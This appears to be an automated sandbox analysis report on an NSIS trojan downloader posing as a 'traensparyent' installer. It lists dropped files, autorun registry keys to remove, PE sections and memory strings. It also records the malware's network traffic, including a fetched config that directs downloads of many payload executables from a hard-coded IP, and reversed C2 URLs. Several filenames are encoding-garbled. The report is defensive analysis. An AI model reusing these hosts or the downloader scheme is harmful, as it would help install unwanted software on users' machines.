%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\ÃÂÂÞ¸´.lnk (834 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\menu_buttons.bmp (920 bytes)
%Program Files%\KS2015010306\V21860\KS21860.exe (7192 bytes)
%Documents and Settings%\%current user%\Application Data\kusuInput\wordlib\user.wlb (3 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÃÂÂÎÄ·ûºÅ.ini (560 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\˫ƴ.ini (1 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\öÃâ€ÂØ.lnk (621 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Æ´Òô¼Ó¼Ó˫ƴ.ini (538 bytes)
%System%\ksime.ime (126018 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\΢ÈÃÂÂ˫ƴ.ini (682 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\phrase\õó¶ÌÓï¿â.ini (784 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Ãâ€â€ÃƒÆ’â€ÂÈ»Âë˫ƴ.ini (580 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\hzpy.dat (18424 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeWord.dll (1552 bytes)
%Program Files%\KS2015010306\V21860\atl100.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsxBA.tmp\KillProcDLL.dll (4 bytes)
%Program Files%\KS2015010306\V21860\config.exe (11344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshB9.tmp (285959 bytes)
%Program Files%\KS2015010306\V21860\Library.dll (5064 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeUnit.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\appbd.txt (1660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\ksimekusu_zhim_007.exe (229152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\Browser_V3.0.1354.0_r_4182_(Build14092214).exe (314625 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\CreateShortcut.exe (13850 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\Furt.exe (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nscB4.tmp\OneDay.exe (122112 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshB3.tmp (19754 bytes)
%Documents and Settings%\%current user%\Desktop\Ó°ÊÓ´óÈ«.lnk (1 bytes)
%Program Files%\Favorite\ico\123.ico (3 bytes)
%Program Files%\Favorite\ico\360.ico (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyB6.tmp (13218 bytes)
%Program Files%\Favorite\ico\tb1.ico (15 bytes)
%Program Files%\Favorite\ico\ay.ico (784 bytes)
%Documents and Settings%\%current user%\Desktop\hao123ÃÂÂøÖ·µ¼º½.lnk (1 bytes)
%Program Files%\Favorite\ico\sg1.ico (9 bytes)
%Documents and Settings%\%current user%\Desktop\Internet Explroer.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\Ëѹ·ÃÂÂøÖ·µ¼º½.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\360ÃÂÂøÖ·µ¼º½.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\°®ÌÃâ€Â±¦.lnk (1 bytes)
%Program Files%\Favorite\ico\movie.ico (12536 bytes)
%Program Files%\Favorite\ico\ie.ico (784 bytes)
%Program Files%\Favorite\ico\23451.ico (9 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"KS21860.exe" = "%Program Files%\KS2015010306\V21860\KS21860.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"KS21860.exe" = "%Program Files%\KS2015010306\V21860\KS21860.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
Company Name:
Product Name: traensparyent
Product Version:
Legal Copyright: ???? (C) 2014
Legal Trademarks:
Original Filename: traensparyent setup
Internal Name: traensparyent setup
File Version:
File Description:
Comments:
Language: Finnish (Finland)
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 23488 | 23552 | 4.48909 | 7ebfade271f75cb4c180603ab653af42 |
.rdata | 28672 | 4496 | 4608 | 3.59139 | 9d6e96915262c9d1129a16fa0b02a19a |
.data | 36864 | 110456 | 1024 | 3.27356 | dbf10679c897d0edeee280fffdad552f |
.ndata | 147456 | 40960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rsrc | 188416 | 70104 | 70144 | 4.18344 | 2d96061016ef26c79c77b41870e3a397 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://www.baidu.traensparyent.com.moyan.cc/db/appbd.txt | 124.232.146.41 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /db/appbd.txt HTTP/1.0
Host: VVV.baidu.traensparyent.com.moyan.cc
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Length: 1660
Content-Type: text/plain
Last-Modified: Tue, 30 Dec 2014 06:12:52 GMT
Accept-Ranges: bytes
ETag: "eee11fa5f723d01:fe4"
Server: IIS
X-Powered-By: WAF/2.0
Date: Sat, 03 Jan 2015 09:53:19 GMT
Connection: close
/*Setting*/..[ff1]..aa=OneDay..bb=OneDay.exe..cc=hXXp://124.232.152.119:18168/db/OneDay.zip..dd=..[ff2]..aa=lnk..bb=CreateShortcut.exe..cc=http://124.232.152.119:18168/db/CreateShortcut.zip..dd=..[ff3]..aa=......bb=ksimekusu_zhim_007.exe..cc=hXXp://124.232.152.119:18168/db/ksimekusu_zhim_007.zip..dd=..[ff4]..aa=uc..bb=Browser_V3.0.1354.0_r_4182_(Build14092214).exe..cc=hXXp://124.232.152.119:18168/db/Browser_V3.0.1354.0_r_4182_(Build14092214).zip..dd=..[ff500]..aa=sd..bb=bgrhf_30279.exe..cc=hXXp://124.232.152.119:18168/db/bgrhf_30279.zip..dd=..[ff6]..aa=........bb=-2406_1_mp.exe..cc=hXXp://124.232.152.119:18168/db/-2406_1_mp.zip..dd=..[ff7]..aa=..............bb=jfzhzszm-1.exe..cc=hXXp://124.232.152.119:18168/db/jfzhzszm-1.zip..dd=..[ff700]..aa=....FM..bb=setup_2948-180095.exe..cc=hXXp://124.232.152.119:18168/db/setup_2948-180095.zip..dd=..[ff8]..aa=tqrl..bb=tqrl_93_2508.exe..cc=hXXp://124.232.152.119:18168/db/tqrl_93_2508.zip..dd=..[ff9]..aa=......bb=weather_b_90045.exe..cc=hXXp://124.232.152.119:18168/db/weather_b_90045.zip..dd=..[ff10]..aa=..........bb=apples_19_2508.exe..cc=hXXp://124.232.152.119:18168/db/apples_19_2508.zip..dd=..[ff11]..aa=......bb=xueba_v2.1.0.0_1013.exe..cc=hXXp://124.232.152.119:18168/db/xueba_v2.1.0.0_1013.zip..dd=..[ff12]..aa=......bb=xksd_50091169079.exe..cc=hXXp://124.232.152.119:18168/db/xksd_50091169079.zip..dd=..[ff13]..aa=......bb=zhezi_setup_Z853.exe..cc=hXXp://124.232.152.119:18168/db/zhezi_setup_Z853.zip..dd=..[ff14]..aa=......bb=CoolRAR1001.exe..cc=hXXp://124.232.152.119:18168
<<< skipped >>>
Map
The Trojan connects to the servers at the following location(s):
Strings from Dumps
%original file name%.exe_1540:
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|/":
\LOCALS~1\Temp\nscB4.tmp\NSISdl.dll
zhim_007.exe"
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nscB4.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nscB4.tmp
V3.0.1354.0_r_4182_(Build14092214).zip
WS2_32.dll
NSISdl.dll
invalid URL
Host: %s
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u minutes remaining)
(%u seconds remaining)
Downloading %s
KERNEL32.DLL
comdlg32.dll
OLEAUT32.dll
oledlg.dll
SHLWAPI.dll
WININET.dll
WINSPOOL.DRV
RegEnumKeyW
.reloc
.GHT,
QH.oY
appbd.txt
_r_4182_(Build14092214).zip
14).exe
2014.09.15.113236
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nscB4.tmp
c:\%original file name%.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nscB4.tmp\traensparyent
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nshB2.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
Browser_V3.0.1354.0_r_4182_(Build14092214).exe
hXXp://124.232.152.119:18168/db/Browser_V3.0.1354.0_r_4182_(Build14092214).zip
Nullsoft Install System v2.46
FFR.D9DD.CN
2.0.0.1
FreeFastRecovery.exe
KS21860.exe_136:
.text
`.rdata
@.data
.rsrc
@.reloc
E:\Calendar2.0.2.0\kssrf\code\build\x86\ksinput.pdb
SHLWAPI.dll
ShellExecuteW
SHELL32.dll
KERNEL32.dll
USER32.dll
RegOpenKeyExW
RegCloseKey
RegOpenKeyW
RegCreateKeyW
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
DeleteUrlCacheEntryW
WININET.dll
URLDownloadToFileW
urlmon.dll
MSVCP100.dll
sqlite3_open
sqlite3_close
sqlite3_get_table
sqlite3_free
sqlite3_free_table
sqlite3_exec
sqlite3.dll
Library.dll
?OnKeyDown@WindowImplBase@DUILIB@@UAEJIIJAAH@Z
?GetMessageMap@WindowImplBase@DUILIB@@MBEPBUDUI_MSGMAP@2@XZ
DirectUI.dll
MSVCR100.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
GetProcessHeap
.?AVTable@SQLite@@
.?AVUTF8MBSTR@SQLite@@
.?AVDatabase@SQLite@@
0#0*00060
; ;$;(;,;0;4;8;
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
%USER%
ksinput.exe
config %d
config.exe
3.0.3.9*%s*%s*%s*0*1*0*0*0
3.0.3.9*%s*%s*%s*0*0*1*0*0
php.ijgnot/moc.8szmx.jtfrs//:ptth
%s?k=%s
select * from plugin where item=%d
n\plugin\plugin.db
CREATE TABLE "plugin" ("item" INTEGER PRIMARY KEY, "vers" INTEGER, "name" VARCHAR, "path" VARCHAR, "file" VARCHAR, "down" VARCHAR)
%s%s%d.zip
update plugin set ver=%d, name='%s', path='%s', file='%s' down='%s' where item=%d
insert into plugin(item,vers,name,path,file,down) values(%d,%d,'%s','%s','%s','%s')
update plugin set vers=%d, name='%s', path='%s', file='%s', down='%s' where item=%d
php.gifnoc/moc.8szmx.afuruhs//:ptth
%s?v=3.0.3.9&t=1&x=%s&c=%d
20150103
3.0.3.9